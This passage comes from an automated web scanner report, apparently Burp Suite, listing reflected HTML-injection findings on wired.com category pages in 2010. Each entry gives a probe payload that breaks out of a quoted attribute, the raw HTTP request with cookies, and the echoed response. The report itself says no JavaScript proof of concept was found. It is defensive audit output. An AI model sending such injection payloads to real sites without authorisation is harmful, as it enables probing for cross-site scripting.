1.137. http://www.wired.com/gadgets/miscellaneous [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gadgets/miscellaneous

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90641"><a>ba5864f027 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gadgets90641"><a>ba5864f027/miscellaneous HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29360
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:12:03 GMT
Date: Sun, 21 Nov 2010 23:08:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgets90641"><a>ba5864f027 ss_miscellaneous">
...[SNIP]...

1.138. http://www.wired.com/gadgets/miscellaneous [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gadgets/miscellaneous

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae2a5"><a>4df9c3f8bcc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gadgets/miscellaneousae2a5"><a>4df9c3f8bcc HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29362
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:18:38 GMT
Date: Sun, 21 Nov 2010 23:08:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgets ss_miscellaneousae2a5"><a>4df9c3f8bcc">
...[SNIP]...

1.139. http://www.wired.com/gadgets/mods [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gadgets/mods

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c6cc"><a>2ec7c30f53a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gadgets5c6cc"><a>2ec7c30f53a/mods HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29344
Vary: Accept-Encoding
Cache-Control: max-age=231
Expires: Sun, 21 Nov 2010 23:12:08 GMT
Date: Sun, 21 Nov 2010 23:08:17 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgets5c6cc"><a>2ec7c30f53a ss_mods">
...[SNIP]...

1.140. http://www.wired.com/gadgets/mods [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gadgets/mods

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload edc27"><a>e4a182d7a54 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gadgets/modsedc27"><a>e4a182d7a54 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29344
Vary: Accept-Encoding
Cache-Control: max-age=595
Expires: Sun, 21 Nov 2010 23:18:45 GMT
Date: Sun, 21 Nov 2010 23:08:50 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgets ss_modsedc27"><a>e4a182d7a54">
...[SNIP]...

1.141. http://www.wired.com/gadgets/pcs [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gadgets/pcs

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29290"><a>3e97c83f0a7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gadgets29290"><a>3e97c83f0a7/pcs HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29342
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:12:18 GMT
Date: Sun, 21 Nov 2010 23:08:18 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgets29290"><a>3e97c83f0a7 ss_pcs">
...[SNIP]...

1.142. http://www.wired.com/gadgets/pcs [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gadgets/pcs

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ea349"><a>abc8fc5b833 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gadgets/pcsea349"><a>abc8fc5b833 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29342
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:18:47 GMT
Date: Sun, 21 Nov 2010 23:08:47 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgets ss_pcsea349"><a>abc8fc5b833">
...[SNIP]...

1.143. http://www.wired.com/gadgets/portablemusic [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gadgets/portablemusic

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 139b1"><a>6824c99afe8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gadgets139b1"><a>6824c99afe8/portablemusic HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29362
Vary: Accept-Encoding
Cache-Control: max-age=233
Expires: Sun, 21 Nov 2010 23:12:16 GMT
Date: Sun, 21 Nov 2010 23:08:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgets139b1"><a>6824c99afe8 ss_portablemusic">
...[SNIP]...

1.144. http://www.wired.com/gadgets/portablemusic [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gadgets/portablemusic

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9890b"><a>1a2bf9e403d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gadgets/portablemusic9890b"><a>1a2bf9e403d HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29362
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:18:52 GMT
Date: Sun, 21 Nov 2010 23:08:52 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgets ss_portablemusic9890b"><a>1a2bf9e403d">
...[SNIP]...

1.145. http://www.wired.com/gadgets/wireless [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gadgets/wireless

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45461"><a>16a5e5e1666 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gadgets45461"><a>16a5e5e1666/wireless HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29352
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:12:23 GMT
Date: Sun, 21 Nov 2010 23:08:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgets45461"><a>16a5e5e1666 ss_wireless">
...[SNIP]...

1.146. http://www.wired.com/gadgets/wireless [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gadgets/wireless

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd750"><a>8d8676eb6a9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gadgets/wirelessbd750"><a>8d8676eb6a9 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29352
Vary: Accept-Encoding
Cache-Control: max-age=597
Expires: Sun, 21 Nov 2010 23:18:52 GMT
Date: Sun, 21 Nov 2010 23:08:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgets ss_wirelessbd750"><a>8d8676eb6a9">
...[SNIP]...

1.147. http://www.wired.com/gaming [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gaming

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4899"><a>1ca469d09ed was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gaminga4899"><a>1ca469d09ed HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29382
Vary: Accept-Encoding
Cache-Control: max-age=222
Expires: Mon, 22 Nov 2010 01:15:04 GMT
Date: Mon, 22 Nov 2010 01:11:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gaminga4899"><a>1ca469d09ed">
...[SNIP]...

1.148. http://www.wired.com/gaming/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gaming/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b691"><a>f527151e420 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gaming3b691"><a>f527151e420/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29383
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 20:18:56 GMT
Date: Sun, 21 Nov 2010 20:14:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gaming3b691"><a>f527151e420">
...[SNIP]...

1.149. http://www.wired.com/gaming/gamingreviews [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gaming/gamingreviews

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e36d"><a>49ae0050530 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gaming5e36d"><a>49ae0050530/gamingreviews HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29413
Vary: Accept-Encoding
Cache-Control: max-age=232
Expires: Sun, 21 Nov 2010 23:12:30 GMT
Date: Sun, 21 Nov 2010 23:08:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gaming5e36d"><a>49ae0050530 ss_gamingreviews">
...[SNIP]...

1.150. http://www.wired.com/gaming/gamingreviews [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gaming/gamingreviews

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1de64"><a>eaff00508ec was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gaming/gamingreviews1de64"><a>eaff00508ec HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29413
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:07 GMT
Date: Sun, 21 Nov 2010 23:09:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gaming ss_gamingreviews1de64"><a>eaff00508ec">
...[SNIP]...

1.151. http://www.wired.com/gaming/hardware [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gaming/hardware

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5e9a"><a>5d92c74d73d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gamingc5e9a"><a>5d92c74d73d/hardware HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29403
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:12:26 GMT
Date: Sun, 21 Nov 2010 23:08:26 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gamingc5e9a"><a>5d92c74d73d ss_hardware">
...[SNIP]...

1.152. http://www.wired.com/gaming/hardware [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gaming/hardware

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 511f3"><a>a929ebce08d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gaming/hardware511f3"><a>a929ebce08d HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29403
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:03 GMT
Date: Sun, 21 Nov 2010 23:09:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gaming ss_hardware511f3"><a>a929ebce08d">
...[SNIP]...

1.153. http://www.wired.com/gaming/virtualworlds [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gaming/virtualworlds

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bdcfc"><a>0a261e4d294 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gamingbdcfc"><a>0a261e4d294/virtualworlds HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
